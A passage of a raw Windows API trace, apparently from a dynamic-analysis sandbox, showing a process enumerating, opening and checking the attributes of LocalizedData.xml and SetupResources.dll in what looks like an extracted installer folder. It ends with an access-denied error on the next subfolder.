Parameter=0x1086e48, Context=0x0) returned 1 [0061.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0061.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.045] AreFileApisANSI () returned 1 [0061.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 45 [0061.045] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.045] GetFileType (hFile=0x428) returned 0x1 [0061.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.046] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.046] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.046] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.046] CloseHandle (hObject=0x428) returned 1 [0061.046] AreFileApisANSI () returned 1 [0061.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0061.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 45 [0061.046] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.046] GetFileType (hFile=0x428) returned 0x1 [0061.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.047] CloseHandle (hObject=0x428) returned 1 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.047] AreFileApisANSI () returned 1 [0061.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 45 [0061.048] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82)) returned 1 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.048] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.048] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.048] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0061.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.048] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.049] AreFileApisANSI () returned 1 [0061.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0061.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.049] AreFileApisANSI () returned 1 [0061.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0061.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 46 [0061.049] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.050] GetFileType (hFile=0x428) returned 0x1 [0061.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.050] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.050] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.050] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.050] CloseHandle (hObject=0x428) returned 1 [0061.050] AreFileApisANSI () returned 1 [0061.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0061.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 46 [0061.051] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.051] GetFileType (hFile=0x428) returned 0x1 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.051] CloseHandle (hObject=0x428) returned 1 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.052] AreFileApisANSI () returned 1 [0061.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71bd0 [0061.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 46 [0061.052] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58)) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.052] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.052] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.052] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x45fe0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓㵘")) returned 0 [0061.052] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0061.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0061.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0061.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0061.053] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.053] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.053] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.053] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.053] AreFileApisANSI () returned 1 [0061.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1042", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1042", lpUsedDefaultChar=0x0) returned 27 [0061.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.053] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.053] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.053] AreFileApisANSI () returned 1 [0061.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042") returned 27 [0061.053] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042" (normalized: "c:\\588bce7c90097ed212\\1042"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.053] GetLastError () returned 0x5 [0061.054] GetLastError () returned 0x5 [0061.054] SetLastError (dwErrCode=0x5) [0061.054] GetLastError () returned 0x5 